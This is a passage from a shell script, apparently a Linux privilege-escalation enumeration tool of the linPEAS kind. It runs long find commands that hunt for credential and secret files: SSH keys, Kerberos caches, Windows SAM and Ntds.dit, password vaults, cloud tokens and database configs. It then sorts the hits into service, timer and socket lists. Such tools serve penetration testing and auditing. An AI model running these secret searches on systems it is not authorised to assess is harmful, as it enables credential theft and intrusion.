\"frakti.sock\" -o -name \"*.pgp\" -o -name \"creds*\" -o -name \"groups.xml\"
2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SYS=`eval_bckgrd
"find ${ROOT_FOLDER}sys -name \"*.service\" -o -name \"*.socket\" -o -name
\"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_SYSTEM=`eval_bckgrd "find ${ROOT_FOLDER}system -name \"*.service\" -o -name
\"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'.
'\\\$NC 1>&2;"` FIND_SYSTEMD=`eval_bckgrd "find ${ROOT_FOLDER}systemd -name
\"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" -o -name
\"rocketchat.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_TMP=`eval_bckgrd "find ${ROOT_FOLDER}tmp -name \"*.sqlite\" -o -name
\"*.gnupg\" -o -name \"*.sqlite3\" -o -name \"SYSTEM\" -o -name
\"gvm-tools.conf\" -o -name \"docker.socket\" -o -name \"config.xml\" -o -name
\"sip.conf\" -o -name \"scclient.exe\" -o -name \"*.ovpn\" -o -name
\"anaconda-ks.cfg\" -o -name \".env*\" -o -name \"KeePass.ini\" -o -name
\"passbolt.php\" -o -name \"AppEvent.Evt\" -o -name \"FreeSSHDservice.ini\" -o
-name \"*.db\" -o -name \"server.xml\" -o -name \"bitcoin.conf\" -o -name
\"SecEvent.Evt\" -o -name \"*.vhdx\" -o -name \"hostapd.conf\" -o -name
\"cesi.conf\" -o -name \"https.conf\" -o -name \"sitemanager.xml\" -o -name
\"*.vhd\" -o -name \"backup\" -o -name \"php.ini\" -o -name \".htpasswd\" -o
-name \"RDCMan.settings\" -o -name \"*.jks\" -o -name \".flyrc\" -o -name
\"*password*\" -o -name \"*vnc*.ini\" -o -name \"legacy_credentials.db\" -o
-name \"SAM\" -o -name \"containerd.sock\" -o -name \"krb5cc_*\" -o -name
\"https-xampp.conf\" -o -name \"*vnc*.txt\" -o -name \"psk.txt\" -o -name
\"winscp.ini\" -o -name \"jetty-realm.properties\" -o -name \"*.rdg\" -o -name
\"kadm5.acl\" -o -name \"datasources.xml\" -o -name \"*credential*\" -o -name
\"hudson.util.Secret\" -o -name \"*.tf\" -o -name \"glusterfs.key\" -o -name
\"sysprep.xml\" -o -name \"*.psk\" -o -name \"fastcgi_params\" -o -name
\"ws_ftp.ini\" -o -name \"cloud.cfg\" -o -name \"*.socket\" -o -name
\"grafana.ini\" -o -name \"authorized_hosts\" -o -name \"airflow.cfg\" -o -name
\"settings.php\" -o -name \"access_tokens.db\" -o -name \"*_history*\" -o -name
\"*.key\" -o -name \"mariadb.cnf\" -o -name \"passwd\" -o -name \".Xauthority\"
-o -name \"pagefile.sys\" -o -name \"mysqld.cnf\" -o -name \"mongod*.conf\" -o
-name \"glusterfs.ca\" -o -name \"secrets.yml\" -o -name \"*.cer\" -o -name
\"*.keytab\" -o -name \".boto\" -o -name \"bash.exe\" -o -name \"docker.sock\"
-o -name \"filezilla.xml\" -o -name \"error.log\" -o -name \"sess_*\" -o -name
\"tomcat-users.xml\" -o -name \"*.pfx\" -o -name \"atlantis.db\" -o -name
\"vault-ssh-helper.hcl\" -o -name \"*.ftpconfig\" -o -name \".credentials.json\"
-o -name \"kibana.y*ml\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o
-name \"scheduledtasks.xml\" -o -name \"httpd.conf\" -o -name \"pg_hba.conf\" -o
-name \"pgadmin4.db\" -o -name \"system.sav\" -o -name \"000-default.conf\" -o
-name \"*.swp\" -o -name \"appcmd.exe\" -o -name \"*.der\" -o -name
\"log4j-core*.jar\" -o -name \".lesshst\" -o -name \"unattended.xml\" -o -name
\"Dockerfile\" -o -name \"rocketchat.service\" -o -name \"*.pem\" -o -name
\".git\" -o -name \"autounattend.xml\" -o -name \".git-credentials\" -o -name
\"printers.xml\" -o -name \"webserver_config.py\" -o -name
\".recently-used.xbel\" -o -name \"snyk.json\" -o -name \"setupinfo\" -o -name
\"mosquitto.conf\" -o -name \"influxdb.conf\" -o -name \"rktlet.sock\" -o -name
\"secrets.ldb\" -o -name \"firebase-tools.json\" -o -name \".pypirc\" -o -name
\"amportal.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"wcx_ftp.ini\" -o
-name \"wsl.exe\" -o -name \".profile\" -o -name \"credentials.db\" -o -name
\"*.crt\" -o -name \".msmtprc\" -o -name \"my.ini\" -o -name \"dockershim.sock\"
-o -name \"*.tfstate\" -o -name \".plan\" -o -name \"FreePBX.conf\" -o -name
\"nginx.conf\" -o -name \"db.php\" -o -name \"my.cnf\" -o -name \"ntuser.dat\"
-o -name \"unattend.xml\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o
-name \"config.php\" -o -name \"backups\" -o -name \".ldaprc\" -o -name
\"ConsoleHost_history.txt\" -o -name \"kcpassword\" -o -name \"ipsec.secrets\"
-o -name \"smb.conf\" -o -name \"autologin\" -o -name \"racoon.conf\" -o -name
\"accessTokens.json\" -o -name \"unattend.txt\" -o -name \"snmpd.conf\" -o -name
\"passwd.ibd\" -o -name \"gitlab.rm\" -o -name \"ffftp.ini\" -o -name \"*.vmdk\"
-o -name \"*.gpg\" -o -name \".google_authenticator\" -o -name
\"protecteduserkey.bin\" -o -name \"wp-config.php\" -o -name
\"elasticsearch.y*ml\" -o -name \".k5login\" -o -name \"access.log\" -o -name
\"recentservers.xml\" -o -name \"sites.ini\" -o -name \"password*.ibd\" -o -name
\"web*.config\" -o -name \"adc.json\" -o -name \"setupinfo.bak\" -o -name
\"database.php\" -o -name \".sudo_as_admin_successful\" -o -name
\"snyk.config.json\" -o -name \"*.timer\" -o -name \"AzureRMContext.json\" -o
-name \"debian.cnf\" -o -name \"postgresql.conf\" -o -name \"TokenCache.dat\" -o
-name \"pgsql.conf\" -o -name \"*.pub\" -o -name \".gitconfig\" -o -name
\"krb5.conf\" -o -name \"known_hosts\" -o -name \"*.kdbx\" -o -name
\".vault-token\" -o -name \"ftp.ini\" -o -name \"*.viminfo\" -o -name
\"hosts.equiv\" -o -name \"iis6.log\" -o -name \"drives.xml\" -o -name
\"crio.sock\" -o -name \"*vnc*.c*nf*\" -o -name \"unattend.inf\" -o -name
\"redis.conf\" -o -name \"ddclient.conf\" -o -name \"fat.config\" -o -name
\"ipsec.conf\" -o -name \"sssd.conf\" -o -name \"sysprep.inf\" -o -name
\"*config*.php\" -o -name \"default.sav\" -o -name \"id_dsa*\" -o -name
\"index.dat\" -o -name \".wgetrc\" -o -name \"access_tokens.json\" -o -name
\"security.sav\" -o -name \"*vnc*.xml\" -o -name \"software.sav\" -o -name
\".roadtools_auth\" -o -name \"supervisord.conf\" -o -name \"ftp.config\" -o
-name \"credentials.xml\" -o -name \"rsyncd.conf\" -o -name
\"docker-compose.yml\" -o -name \"master.key\" -o -name \"*.keystore\" -o -name
\"glusterfs.pem\" -o -name \"rsyncd.secrets\" -o -name \"agent*\" -o -name
\"autologin.conf\" -o -name \"api_key\" -o -name \"KeePass.config*\" -o -name
\".rhosts\" -o -name \"*.keyring\" -o -name \".secrets.mkey\" -o -name
\"*.service\" -o -name \"zabbix_server.conf\" -o -name \".github\" -o -name
\"KeePass.enforced*\" -o -name \".bashrc\" -o -name \"pwd.ibd\" -o -name
\"id_rsa*\" -o -name \"sentry.conf.py\" -o -name \".erlang.cookie\" -o -name
\"*.p12\" -o -name \"NetSetup.log\" -o -name \"azureProfile.json\" -o -name
\"rpcd\" -o -name \"vsftpd.conf\" -o -name \"authorized_keys\" -o -name
\"Elastix.conf\" -o -name \"software\" -o -name \"*.csr\" -o -name
\"plum.sqlite\" -o -name \"frakti.sock\" -o -name \"*.pgp\" -o -name \"creds*\"
-o -name \"groups.xml\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_USR=`eval_bckgrd "find ${ROOT_FOLDER}usr -name \"*.sqlite\" -o -name
\"*.gnupg\" -o -name \"*.sqlite3\" -o -name \"SYSTEM\" -o -name
\"gvm-tools.conf\" -o -name \"docker.socket\" -o -name \"config.xml\" -o -name
\"sip.conf\" -o -name \"scclient.exe\" -o -name \"*.ovpn\" -o -name
\"anaconda-ks.cfg\" -o -name \".env*\" -o -name \"KeePass.ini\" -o -name
\"passbolt.php\" -o -name \"AppEvent.Evt\" -o -name \"FreeSSHDservice.ini\" -o
-name \"*.db\" -o -name \"server.xml\" -o -name \"bitcoin.conf\" -o -name
\"SecEvent.Evt\" -o -name \"*.vhdx\" -o -name \"hostapd.conf\" -o -name
\"cesi.conf\" -o -name \"https.conf\" -o -name \"sitemanager.xml\" -o -name
\"*.vhd\" -o -name \"backup\" -o -name \"php.ini\" -o -name \".htpasswd\" -o
-name \"RDCMan.settings\" -o -name \"*.jks\" -o -name \".flyrc\" -o -name
\"*password*\" -o -name \"*vnc*.ini\" -o -name \"legacy_credentials.db\" -o
-name \"SAM\" -o -name \"containerd.sock\" -o -name \"krb5cc_*\" -o -name
\"https-xampp.conf\" -o -name \"*vnc*.txt\" -o -name \"psk.txt\" -o -name
\"winscp.ini\" -o -name \"jetty-realm.properties\" -o -name \"*.rdg\" -o -name
\"kadm5.acl\" -o -name \"datasources.xml\" -o -name \"*credential*\" -o -name
\"hudson.util.Secret\" -o -name \"*.tf\" -o -name \"glusterfs.key\" -o -name
\"sysprep.xml\" -o -name \"*.psk\" -o -name \"fastcgi_params\" -o -name
\"ws_ftp.ini\" -o -name \"cloud.cfg\" -o -name \"*.socket\" -o -name
\"grafana.ini\" -o -name \"authorized_hosts\" -o -name \"airflow.cfg\" -o -name
\"settings.php\" -o -name \"access_tokens.db\" -o -name \"*_history*\" -o -name
\"*.key\" -o -name \"mariadb.cnf\" -o -name \"passwd\" -o -name \".Xauthority\"
-o -name \"pagefile.sys\" -o -name \"mysqld.cnf\" -o -name \"mongod*.conf\" -o
-name \"glusterfs.ca\" -o -name \"secrets.yml\" -o -name \"*.cer\" -o -name
\"*.keytab\" -o -name \".boto\" -o -name \"bash.exe\" -o -name \"docker.sock\"
-o -name \"filezilla.xml\" -o -name \"error.log\" -o -name \"tomcat-users.xml\"
-o -name \"ssh*config\" -o -name \"*.pfx\" -o -name \"atlantis.db\" -o -name
\"vault-ssh-helper.hcl\" -o -name \"*.ftpconfig\" -o -name \".credentials.json\"
-o -name \"kibana.y*ml\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o
-name \"scheduledtasks.xml\" -o -name \"httpd.conf\" -o -name \"pg_hba.conf\" -o
-name \"pgadmin4.db\" -o -name \"system.sav\" -o -name \"000-default.conf\" -o
-name \"*.swp\" -o -name \"appcmd.exe\" -o -name \"*.der\" -o -name
\"log4j-core*.jar\" -o -name \".lesshst\" -o -name \"unattended.xml\" -o -name
\"Dockerfile\" -o -name \"rocketchat.service\" -o -name \"*.pem\" -o -name
\".git\" -o -name \"autounattend.xml\" -o -name \".git-credentials\" -o -name
\"printers.xml\" -o -name \"webserver_config.py\" -o -name
\".recently-used.xbel\" -o -name \"snyk.json\" -o -name \"setupinfo\" -o -name
\"mosquitto.conf\" -o -name \"influxdb.conf\" -o -name \"rktlet.sock\" -o -name
\"secrets.ldb\" -o -name \"firebase-tools.json\" -o -name \".pypirc\" -o -name
\"amportal.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"wcx_ftp.ini\" -o
-name \"wsl.exe\" -o -name \".profile\" -o -name \"credentials.db\" -o -name
\"*.crt\" -o -name \".msmtprc\" -o -name \"my.ini\" -o -name \"dockershim.sock\"
-o -name \"*.tfstate\" -o -name \".plan\" -o -name \"FreePBX.conf\" -o -name
\"nginx.conf\" -o -name \"db.php\" -o -name \"my.cnf\" -o -name \"ntuser.dat\"
-o -name \"unattend.xml\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o
-name \"config.php\" -o -name \"backups\" -o -name \".ldaprc\" -o -name
\"ConsoleHost_history.txt\" -o -name \"kcpassword\" -o -name \"ipsec.secrets\"
-o -name \"smb.conf\" -o -name \"autologin\" -o -name \"racoon.conf\" -o -name
\"accessTokens.json\" -o -name \"unattend.txt\" -o -name \"snmpd.conf\" -o -name
\"passwd.ibd\" -o -name \"gitlab.rm\" -o -name \"ffftp.ini\" -o -name \"*.vmdk\"
-o -name \"*.gpg\" -o -name \".google_authenticator\" -o -name
\"protecteduserkey.bin\" -o -name \"wp-config.php\" -o -name
\"elasticsearch.y*ml\" -o -name \".k5login\" -o -name \"access.log\" -o -name
\"recentservers.xml\" -o -name \"sites.ini\" -o -name \"password*.ibd\" -o -name
\"web*.config\" -o -name \"adc.json\" -o -name \"setupinfo.bak\" -o -name
\"database.php\" -o -name \".sudo_as_admin_successful\" -o -name
\"snyk.config.json\" -o -name \"*.timer\" -o -name \"AzureRMContext.json\" -o
-name \"debian.cnf\" -o -name \"postgresql.conf\" -o -name \"TokenCache.dat\" -o
-name \"pgsql.conf\" -o -name \"*.pub\" -o -name \".gitconfig\" -o -name
\"krb5.conf\" -o -name \"known_hosts\" -o -name \"*.kdbx\" -o -name
\".vault-token\" -o -name \"ftp.ini\" -o -name \"*.viminfo\" -o -name
\"hosts.equiv\" -o -name \"iis6.log\" -o -name \"drives.xml\" -o -name
\"crio.sock\" -o -name \"*vnc*.c*nf*\" -o -name \"unattend.inf\" -o -name
\"redis.conf\" -o -name \"ddclient.conf\" -o -name \"fat.config\" -o -name
\"ipsec.conf\" -o -name \"sssd.conf\" -o -name \"sysprep.inf\" -o -name
\"*config*.php\" -o -name \"default.sav\" -o -name \"id_dsa*\" -o -name
\"index.dat\" -o -name \".wgetrc\" -o -name \"access_tokens.json\" -o -name
\"security.sav\" -o -name \"*vnc*.xml\" -o -name \"software.sav\" -o -name
\".roadtools_auth\" -o -name \"supervisord.conf\" -o -name \"ftp.config\" -o
-name \"credentials.xml\" -o -name \"rsyncd.conf\" -o -name
\"docker-compose.yml\" -o -name \"master.key\" -o -name \"*.keystore\" -o -name
\"glusterfs.pem\" -o -name \"rsyncd.secrets\" -o -name \".rhosts\" -o -name
\"autologin.conf\" -o -name \"api_key\" -o -name \"KeePass.config*\" -o -name
\"*.keyring\" -o -name \".secrets.mkey\" -o -name \"*.service\" -o -name
\"zabbix_server.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o
-name \".bashrc\" -o -name \"pwd.ibd\" -o -name \"id_rsa*\" -o -name
\"sentry.conf.py\" -o -name \".erlang.cookie\" -o -name \"*.p12\" -o -name
\"NetSetup.log\" -o -name \"azureProfile.json\" -o -name \"rpcd\" -o -name
\"vsftpd.conf\" -o -name \"authorized_keys\" -o -name \"Elastix.conf\" -o -name
\"software\" -o -name \"*.csr\" -o -name \"plum.sqlite\" -o -name
\"frakti.sock\" -o -name \"*.pgp\" -o -name \"creds*\" -o -name \"groups.xml\"
2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_VAR=`eval_bckgrd
"find ${ROOT_FOLDER}var -name \"*.sqlite\" -o -name \"*.gnupg\" -o -name
\"*.sqlite3\" -o -name \"SYSTEM\" -o -name \"gvm-tools.conf\" -o -name
\"docker.socket\" -o -name \"config.xml\" -o -name \"sip.conf\" -o -name
\"scclient.exe\" -o -name \"*.ovpn\" -o -name \"anaconda-ks.cfg\" -o -name
\".env*\" -o -name \"KeePass.ini\" -o -name \"passbolt.php\" -o -name
\"AppEvent.Evt\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.db\" -o -name
\"server.xml\" -o -name \"bitcoin.conf\" -o -name \"SecEvent.Evt\" -o -name
\"*.vhdx\" -o -name \"hostapd.conf\" -o -name \"cesi.conf\" -o -name
\"https.conf\" -o -name \"sitemanager.xml\" -o -name \"*.vhd\" -o -name
\"backup\" -o -name \"php.ini\" -o -name \".htpasswd\" -o -name
\"RDCMan.settings\" -o -name \"*.jks\" -o -name \".flyrc\" -o -name
\"*password*\" -o -name \"*vnc*.ini\" -o -name \"legacy_credentials.db\" -o
-name \"SAM\" -o -name \"containerd.sock\" -o -name \"krb5cc_*\" -o -name
\"https-xampp.conf\" -o -name \"*vnc*.txt\" -o -name \"psk.txt\" -o -name
\"winscp.ini\" -o -name \"jetty-realm.properties\" -o -name \"*.rdg\" -o -name
\"kadm5.acl\" -o -name \"datasources.xml\" -o -name \"*credential*\" -o -name
\"hudson.util.Secret\" -o -name \"*.tf\" -o -name \"glusterfs.key\" -o -name
\"sysprep.xml\" -o -name \"*.psk\" -o -name \"fastcgi_params\" -o -name
\"ws_ftp.ini\" -o -name \"cloud.cfg\" -o -name \"*.socket\" -o -name
\"grafana.ini\" -o -name \"authorized_hosts\" -o -name \"airflow.cfg\" -o -name
\"settings.php\" -o -name \"access_tokens.db\" -o -name \"*_history*\" -o -name
\"*.key\" -o -name \"mariadb.cnf\" -o -name \"passwd\" -o -name \".Xauthority\"
-o -name \"pagefile.sys\" -o -name \"mysqld.cnf\" -o -name \"mongod*.conf\" -o
-name \"glusterfs.ca\" -o -name \"secrets.yml\" -o -name \"*.cer\" -o -name
\"*.keytab\" -o -name \".boto\" -o -name \"bash.exe\" -o -name \"docker.sock\"
-o -name \"filezilla.xml\" -o -name \"error.log\" -o -name \"sess_*\" -o -name
\"tomcat-users.xml\" -o -name \"*.pfx\" -o -name \"atlantis.db\" -o -name
\"vault-ssh-helper.hcl\" -o -name \"*.ftpconfig\" -o -name \".credentials.json\"
-o -name \"kibana.y*ml\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o
-name \"scheduledtasks.xml\" -o -name \"httpd.conf\" -o -name \"pg_hba.conf\" -o
-name \"pgadmin4.db\" -o -name \"system.sav\" -o -name \"000-default.conf\" -o
-name \"*.swp\" -o -name \"appcmd.exe\" -o -name \"*.der\" -o -name
\"log4j-core*.jar\" -o -name \".lesshst\" -o -name \"unattended.xml\" -o -name
\"Dockerfile\" -o -name \"rocketchat.service\" -o -name \"*.pem\" -o -name
\".git\" -o -name \"autounattend.xml\" -o -name \".git-credentials\" -o -name
\"printers.xml\" -o -name \"webserver_config.py\" -o -name
\".recently-used.xbel\" -o -name \"snyk.json\" -o -name \"setupinfo\" -o -name
\"mosquitto.conf\" -o -name \"influxdb.conf\" -o -name \"rktlet.sock\" -o -name
\"secrets.ldb\" -o -name \"firebase-tools.json\" -o -name \".pypirc\" -o -name
\"amportal.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"wcx_ftp.ini\" -o
-name \"wsl.exe\" -o -name \".profile\" -o -name \"credentials.db\" -o -name
\"*.crt\" -o -name \".msmtprc\" -o -name \"my.ini\" -o -name \"dockershim.sock\"
-o -name \"*.tfstate\" -o -name \".plan\" -o -name \"FreePBX.conf\" -o -name
\"nginx.conf\" -o -name \"db.php\" -o -name \"my.cnf\" -o -name \"ntuser.dat\"
-o -name \"unattend.xml\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o
-name \"config.php\" -o -name \"backups\" -o -name \".ldaprc\" -o -name
\"ConsoleHost_history.txt\" -o -name \"kcpassword\" -o -name \"ipsec.secrets\"
-o -name \"smb.conf\" -o -name \"autologin\" -o -name \"racoon.conf\" -o -name
\"accessTokens.json\" -o -name \"unattend.txt\" -o -name \"snmpd.conf\" -o -name
\"passwd.ibd\" -o -name \"gitlab.rm\" -o -name \"ffftp.ini\" -o -name \"*.vmdk\"
-o -name \"*.gpg\" -o -name \".google_authenticator\" -o -name
\"protecteduserkey.bin\" -o -name \"wp-config.php\" -o -name
\"elasticsearch.y*ml\" -o -name \".k5login\" -o -name \"access.log\" -o -name
\"recentservers.xml\" -o -name \"sites.ini\" -o -name \"password*.ibd\" -o -name
\"web*.config\" -o -name \"adc.json\" -o -name \"setupinfo.bak\" -o -name
\"database.php\" -o -name \".sudo_as_admin_successful\" -o -name
\"snyk.config.json\" -o -name \"*.timer\" -o -name \"AzureRMContext.json\" -o
-name \"debian.cnf\" -o -name \"postgresql.conf\" -o -name \"TokenCache.dat\" -o
-name \"pgsql.conf\" -o -name \"*.pub\" -o -name \".gitconfig\" -o -name
\"krb5.conf\" -o -name \"known_hosts\" -o -name \"*.kdbx\" -o -name
\".vault-token\" -o -name \"ftp.ini\" -o -name \"*.viminfo\" -o -name
\"hosts.equiv\" -o -name \"iis6.log\" -o -name \"drives.xml\" -o -name
\"crio.sock\" -o -name \"*vnc*.c*nf*\" -o -name \"unattend.inf\" -o -name
\"redis.conf\" -o -name \"ddclient.conf\" -o -name \"fat.config\" -o -name
\"ipsec.conf\" -o -name \"sssd.conf\" -o -name \"sysprep.inf\" -o -name
\"*config*.php\" -o -name \"default.sav\" -o -name \"id_dsa*\" -o -name
\"index.dat\" -o -name \".wgetrc\" -o -name \"access_tokens.json\" -o -name
\"security.sav\" -o -name \"*vnc*.xml\" -o -name \"software.sav\" -o -name
\".roadtools_auth\" -o -name \"supervisord.conf\" -o -name \"ftp.config\" -o
-name \"credentials.xml\" -o -name \"rsyncd.conf\" -o -name
\"docker-compose.yml\" -o -name \"master.key\" -o -name \"*.keystore\" -o -name
\"glusterfs.pem\" -o -name \"rsyncd.secrets\" -o -name \".rhosts\" -o -name
\"autologin.conf\" -o -name \"api_key\" -o -name \"KeePass.config*\" -o -name
\"*.keyring\" -o -name \".secrets.mkey\" -o -name \"*.service\" -o -name
\"zabbix_server.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o
-name \".bashrc\" -o -name \"pwd.ibd\" -o -name \"id_rsa*\" -o -name
\"sentry.conf.py\" -o -name \".erlang.cookie\" -o -name \"*.p12\" -o -name
\"NetSetup.log\" -o -name \"azureProfile.json\" -o -name \"rpcd\" -o -name
\"vsftpd.conf\" -o -name \"authorized_keys\" -o -name \"Elastix.conf\" -o -name
\"software\" -o -name \"*.csr\" -o -name \"plum.sqlite\" -o -name
\"frakti.sock\" -o -name \"*.pgp\" -o -name \"creds*\" -o -name \"groups.xml\"
2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_CONCOURSE_AUTH=`eval_bckgrd "find ${ROOT_FOLDER}concourse-auth -name
\"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort;
printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_CONCOURSE_KEYS=`eval_bckgrd "find
${ROOT_FOLDER}concourse-keys -name \"*.service\" -o -name \"*.socket\" -o -name
\"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` wait #
Always wait at the end CONT_THREADS=0 #Reset the threads counter fi if [
"$SEARCH_IN_FOLDER" ] || echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets
|| echo $CHECKS | grep -q software_information || echo $CHECKS | grep -q
interesting_files; then # GENERATE THE STORAGES OF THE FOUND FILES
PSTORAGE_SYSTEMD=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}lib|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sys|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}private|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}run|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}var|^${ROOT_FOLDER}system|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}.cache"
| grep -E ".*\.service$" | sort | uniq | head -n 70) PSTORAGE_TIMER=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}lib|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sys|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}private|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}run|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}var|^${ROOT_FOLDER}system|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}.cache"
| grep -E ".*\.timer$" | sort | uniq | head -n 70) PSTORAGE_SOCKET=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}lib|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sys|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}private|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}run|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}var|^${ROOT_FOLDER}system|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}.cache"
| grep -E ".*\.socket$" | sort | uniq | head -n 70) PSTORAGE_DBUS=$(echo -e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E "^${ROOT_FOLDER}etc" | grep -E "system\.d$" | sort | uniq | head -n
70) PSTORAGE_MYSQL=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -v -E 'mysql/mysql' | grep -E
'^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E
